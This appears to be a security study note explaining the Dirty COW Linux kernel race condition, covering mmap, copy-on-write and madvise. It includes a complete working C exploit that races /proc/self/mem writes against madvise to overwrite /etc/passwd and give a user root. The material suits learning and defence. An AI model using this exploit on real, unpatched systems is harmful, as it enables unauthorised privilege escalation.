# Dirty COW Vulnerabilities

Dirty COW race condition was first discovered and exploited in 2016 as a Linux Kernel bug. The bug was latent in linux kernel for 9 years prior to its disclosure. The exploit allows attackers to modify any protected file, even though these files are only readable to them. 

### Memory Mapping 
`mmap()` is a POSIX-compliant system call that maps files or devices into memory. Default mapping type is file-backed mapping, which maps an area of a process' virtual memory to files; reading from the mapped area causes the file to be read. 
```c
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <string.h>

int main() 
{
    struct stat st;
    char content[20];
    char *new_content = "New Content";
    void *map;
    
    int f = open("./zzz", O_RDWR); 
    fstat(f, &st);
    // map the entire file to memory. 
    map = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, f, 0);
    //read 10 bytes from the file via mapped memory
    memcpy((void*) content, map, 10);  
    printf("read: %s\n", content);
    
    //write to the file via mapped memory
    memcpy(map+5, new_content, strlen(new_content)); 
    
    //clean up
    munmap(map, st.st_size);
    close(f);
    return 0; 
}
```
#### Explanation of lines:
`map = mmap(NULL, st.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, f, 0); `
* The first argument specifies starting address of mapped memory, NULL means kernel picks it.
* Second argument specifies the size of the mapped memory.
* Third argument specifies whether meomry is readable , writable. It should match the mode specified in the previous `open()` system call.
* The fourth argument determines whether an update to the mapping is visible to other processes mapping the same region, and whether the update is carried through to the underlying file. `MAP_SHARE` means visible, wheresas `MAP_RPVIATE` not. 
* The fifth argument specifies file that needs to be mapped.
* sixth argument specifies an offset, indicating from where inside the file mapping should start.

`memcpy((void*)content, map, 10);`
`memcpy(map+5, new_content, strlen(new_content));`
* Once the mapped memory is created, we can acess the memory region instead of the file directly. 
* we can read from the memory, as specifying the buffer pointer in arg1. 
* we can also write to the memory, as specified in the buffer in arg2.

memory mapping is used mostly for Interprocess Communication. Processes sometimes have to share the same memory, and the mapped memory behaves like the shared memory between two processes. 

#### MAP_SHARED, MAP_PRIVATE and Copy on Write 
`mmap()` system call:
* create a new mapping in the virtual address space of the calling process 
* when it is used on a file, file content will be loaded into physical memory 
* physical memory will then be loaded into process's virtual memory, mostly through paging.

When multiple processes map the same file to mempry, although they can map the file to different virutal memory address, the physical memory that holds the file is fixed. <br>
* if the `MAP_SHARED` flag is on, when writing to the mapped memory, the physical memory will also be updated and visible to other processes. 
* If `MAP_PRIVATE` flag is on, the file is mapped to the memory private to the calling process, so the changes will not be visible to other processes, nor will the change take place in the underlying file (on physical memory level). This mostly measns that the calling process has a _private copy_ of the file in its virtual memory. 
    * The content of the file needs to be copied into the private memory region, but it is often delayed until needed.
    * Therefore, memory mapped with `MAP_PRIVATE` still initially points to the physical memory. 
    * The private copy is performed only when the process requires to write to memory, in which circumstance, the OS kernel will allocate new memory for the task. 
    * The OS will then update the page table of the process, so the mapped virtual memory will now point to the new phuysical memory, and any read and write will be redirected to this memory location. (private copy) 
![map](./image_files/MAP.png)

#### Copy on Write
__COW(Copy on Write)__ is the behavior described above. It is an optimization technique that allows virtual pages of memory in different processes to map to the same physical techniques that allow vritual page of memory in different processes to map to the same physical memory pages if they have identical content. <br>
COW is widely used in modern operating systems. Another example is the `fork()` system call, where the child process first have a copy of the parent's process. 
* The copy is time consuming so OS often delay until it is absolutely mecessary (procrastination). 
* The OS let the child process share the parent process's memory by making their page entries point to the same physical memory. 
* The page entries for both processes are normally set to read-only to prevent writing to memory. 
* When one process tries to write to the memory, exception will be raised, and OS will begin to allocate new physical memory for child process (Copy the contents from parent process, and change child's page table, so that each process's page table points to its own private copy of memory) 


#### Discard the Copied Memory 
After a program gets its private copy of the mapped memory, it can use a system call `madvise()` to further advise the kernel regarding the memory. The system call is defined as:
```c
int madvise(void *addr, size_t length, int advice); 
```
It gives advices or directions to the kernel about the memory from address `addr` to `addr + length`. The `MADV_DONTNEED` advice is used in Dirty COW attack. When this flag is used as the advice, we tell the kernel that we do not need the claimed part of the address anymore. The kernel will free the resource of the claimed address. <br>
However, if the pages we want to discard originally belong to some mapped memory, then after we use `madvise()` with `MADV_DONTNEED` advice, the process' page table will point back to the original physical memory. <br> 
This is a vulnerability, because the process might can still write to the physical memory. 

### A Read-only Scenario 
The following scenario is a well-defined copy when write scenario. <br> 
Suppose we have a read-only file that cannot be written using `memcpy` and can only be opened via `O_RDONLY` flag and accessed via `PROT_READ` flag. However, in linux, if a file is mapped using `MAP_PRIVATE`, the OS can make an exception and write to mapped memory via `write()` call, which is theoretically safe since it writes to the private copy. 

```c
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char** argv) 
{
    char *content = "**New Content**"; 
    char buffer[30];
    struct stat st; 
    void *map;
    
    int f=open("/zzz", O_RDONLY);
    fstat(f, &st);
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0); //MAP_PRIVATE flag on
    
    //open process's memory pseudo-file 
    int fm = open("/proc/self/mem", O_RDWR); 
    
    //start at 5th byte from beginning 
    lseek(fm, (off_t) map + 5, SEEK_SET);
    
    // write to the memory
    write(fm, content, strlen(content));
    
    //check whether the write is successful 
    memcpy(buffer, map, 29); 
    printf("content after write: %s\n", buffer);
    
    //check contents after madvise 
    madvise(map, st.st_size, MADV_DONTNEED);
    memcpy(buffer, map, 29); 
    printf("Content after madvise: %s\n", buffer);     
    return 0; 
}

```

The write will only be on the private copy of the mapped memory, not directly on the mapped memory itself. So if we run the program, mapped memory will be modified. After the `madvise` call, the print statement will print the content of the file, which is not changed, and this shows that after the `madvise` with `MDAV_DONTNEED` flag, the private copy is abolished and the page table points back to the original mapped memory (the file's physical memory)

### Dirty COW Exploit 

In the above scenario, we have shown that `write` can be used to write to the mapped memory. For the memory of the copy-on-write type, the system call has to perform three essential steps:
* Make a copy of the mapped memory
* Update the page table, so virtual memory now points to the newly created physical memory
* write to the memory 
These three steps are not atomic and may cause race conditions. The execution of one step may be interrupted by other threads or processes. If, for example, between step 2 and 3, we use the `madvise()` with `MADV_DONTNEED` advice, we can discard the private copy of the mapped memory, so page table can point back to the original mapped memory again. If in this case, we are able to write directly to the physical memory holding the file content. This causes a write to the read-only file. <br> 
![COW](./image_files/COW.png)
The `write` system call checks in the beginning about protection about the mapped memory, but only in the beginning. After page table update and copy to the private virtual memory, the write no longer checks. If in the third step, `write` checks again, the problem can be avoided. <br>
For the exploit, therefore, we need two threads
* one trying to write to the mapped memory via `write()` 
* the other trying to discard the private copy of the mapped memory using `madvise()` 
If the desired execution becomes as shown in the figure above (`madvise()` between Step B and Step C), we trigger the race condition. 

### Step1: Selecting /etc/passwd as Target File
the goal is to change the current user's privilege to 0, which represents root privilege. 
suppose the current user is `testcow`.
```
cat /etc/passwd | grep testcow 
```

### Step 2: Set up Memory Mapping and Threads 
We need to first map the target file into memory. Then create the two threads we talked about above to try to reach race conditions. 

```c
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/stat.h>
#include <string.h>

void *map;


//thread one: write thread 
// tries to replace testcow:x:1001 with testcow:x:0000 
void *writeThread(void *arg)
{
    char *content = "testcow:x:0000"; 
    off_t offset = (off_t) arg;
    int f = open("/proc/self/mem", O_RDWR);
    while (1) {
        //move the file pointer to the corresponding position 
        lseek(f, offset, SEEK_SET); 
        write(f, content, strlen(content));
    }
}

//thread two: madvise thread 
// discard the previous mapped memory
void *madviseThread(void *arg)
{
    int file_size = (int) arg;
    while(1) 
    {
        madvise(map, file_size, MADV_DONTNEED); 
    }
}

//main thread
int main(int argc, char** argv)
{
    pthread_t pth1, pth2;
    struct stat st;
    int file_size;
    
    int f = open("/etc/passwd", O_RDONLY);
    
    fstat(f, &st); 
    file_size = st.st_size; 
    map = mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);
    char *position = strstr(map, "testcow:x:1001");
    
    //two threads in parallel
    pthread_create(&pth1, NULL, madviseThread, (void *)file_size);
    pthread_create(&pth2, NULL, writeThread, position); 
    
    //join
    pthread_join(pth1, NULL);
    pthread_join(pth2, NULL);
    return 0;

}
```

For whether the test has succeeded, the user needs to press `Ctrl-C` to terminate after several seconds and try to view the content of the passwd file. Successful exploit will make user `testcow` a root privileged user.

__This vulnerability has already been fixed in Linux Kernel__. 
However, we can see, from the recent __spectre__ and __meltdown__ exploit from the Intel chips, that __Plenty of Exploits are due to performance design issues__. Here the Linux Copy-on-Write and the Intel's Out-of-Execution are all mechanisms that either delay or advance in event: I think this leaves room for further zero-day exploit for systems. 